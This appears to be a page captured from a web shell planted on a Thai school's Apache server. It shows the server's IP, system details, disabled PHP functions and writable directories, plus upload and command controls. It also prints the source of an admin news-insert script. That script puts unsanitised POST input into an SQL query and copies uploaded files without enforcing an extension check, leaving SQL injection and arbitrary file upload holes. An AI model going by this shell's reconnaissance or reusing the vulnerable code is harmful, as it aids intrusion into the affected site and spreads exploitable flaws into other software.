403Webshell
Server IP : 202.29.229.35  /  Your IP : 3.145.70.197
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin/pdNews_insert.php
<?php 
session_start();
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}

	/*	include('connect/connect.php');
		include('connect/function.php');
		*/
		$dp_id=$_SESSION['r_workId'];
		$adminID=$_SESSION['r_adID'];
		
		$Title=$_POST['title'];
		$detail=$_POST['detail'];
		
		
		$Titlefile1=$_POST['Titlefile1'];
		$Titlefile2=$_POST['Titlefile2'];
		$Titlefile3=$_POST['Titlefile3'];
		$Titlefile4=$_POST['Titlefile4'];
		$Titlefile5=$_POST['Titlefile5'];
		
		$filedocument1=$_FILES['filUpload1']['tmp_name'];
		$filedocument1_name=$_FILES['filUpload1']['name'];
		
		$filedocument2=$_FILES['filUpload2']['tmp_name'];
		$filedocument2_name=$_FILES['filUpload2']['name'];
		
		$filedocument3=$_FILES['filUpload3']['tmp_name'];
		$filedocument3_name=$_FILES['filUpload3']['name'];
		
		$filedocument4=$_FILES['filUpload4']['tmp_name'];
		$filedocument4_name=$_FILES['filUpload4']['name'];
		
		$filedocument5=$_FILES['filUpload5']['tmp_name'];
		$filedocument5_name=$_FILES['filUpload5']['name'];
		
		if($filedocument1 <> ""){
			$ext1=strtolower(end(explode('.',$filedocument1_name)));
			if($file_size1=checkdownfiledpNews($ext1)){
				}
				$filedocument_ori1="1"."_".date("Ymdhis").'.'.$ext1;
				
		}else{
				$filedocument_ori1="";
		}
		
		if($filedocument2 <> ""){
			$ext2=strtolower(end(explode('.',$filedocument2_name)));
			if($file_size2=checkdownfiledpNews($ext2)){
				}
				$filedocument_ori2="2"."_".date("Ymdhis").'.'.$ext2;
				
		}else{
				$filedocument_ori2="";
		}
		
		if($filedocument3 <> ""){
			$ext3=strtolower(end(explode('.',$filedocument3_name)));
			if($file_size3=checkdownfiledpNews($ext3)){
				}
				$filedocument_ori3="3"."_".date("Ymdhis").'.'.$ext3;
				
		}else{
				$filedocument_ori3="";
		}		
		
		if($filedocument4 <> ""){
			$ext4=strtolower(end(explode('.',$filedocument4_name)));
			if($file_size4=checkdownfiledpNews($ext4)){
				}
				$filedocument_ori4="4"."_".date("Ymdhis").'.'.$ext4;
				
		}else{
				$filedocument_ori4="";
		}
		
		if($filedocument5 <> ""){
			$ext5=strtolower(end(explode('.',$filedocument5_name)));
			if($file_size5=checkdownfiledpNews($ext5)){
				}
				$filedocument_ori5="5"."_".date("Ymdhis").'.'.$ext5;
				
		}else{
				$filedocument_ori5="";
		}
		
	$date=date('Y:m:d');
	$time=date("H:i:s");
	
		$sql="insert into tbl_dpnews (dpN_Title,dpN_Detail,dpN_Fiel,dpN_Date,dpN_Time,dp_ID,dpN_Fiel2,dpN_Fiel3,dpN_Fiel4,dpN_Fiel5,fileName1,fileName2,fileName3,fileName4,fileName5) values ('$Title','$detail','$filedocument_ori1','$date','$time','$adminID','$filedocument_ori2','$filedocument_ori3','$filedocument_ori4','$filedocument_ori5','$Titlefile1','$Titlefile2','$Titlefile3','$Titlefile4','$Titlefile5')";
		echo "==>".$sql;
		
		$result=mysqli_query($connect1,$sql);
			if($result){
				if($filedocument1 <>""){
				copy ($filedocument1,"file_dpNews/$filedocument_ori1");
				}
				if($filedocument2 <>""){
				copy ($filedocument2,"file_dpNews/$filedocument_ori2");
				}
				if($filedocument3 <>""){
				copy ($filedocument3,"file_dpNews/$filedocument_ori3");
				}
				if($filedocument4 <>""){
				copy ($filedocument4,"file_dpNews/$filedocument_ori4");
				}
				if($filedocument5 <>""){
				copy ($filedocument5,"file_dpNews/$filedocument_ori5");
				}
				
				echo "<script language='javascript'>alert('บันทึกข้อมูลเรียบร้อยแล้ว')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=pdNews">';
			}else{
				echo "<script language='javascript'>alert('ไม่สามารถบันทึกข้อมูลได้')</script>";
				//echo '<meta http-equiv="refresh" content="0;url=index.php?i=pdNews">';
				}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit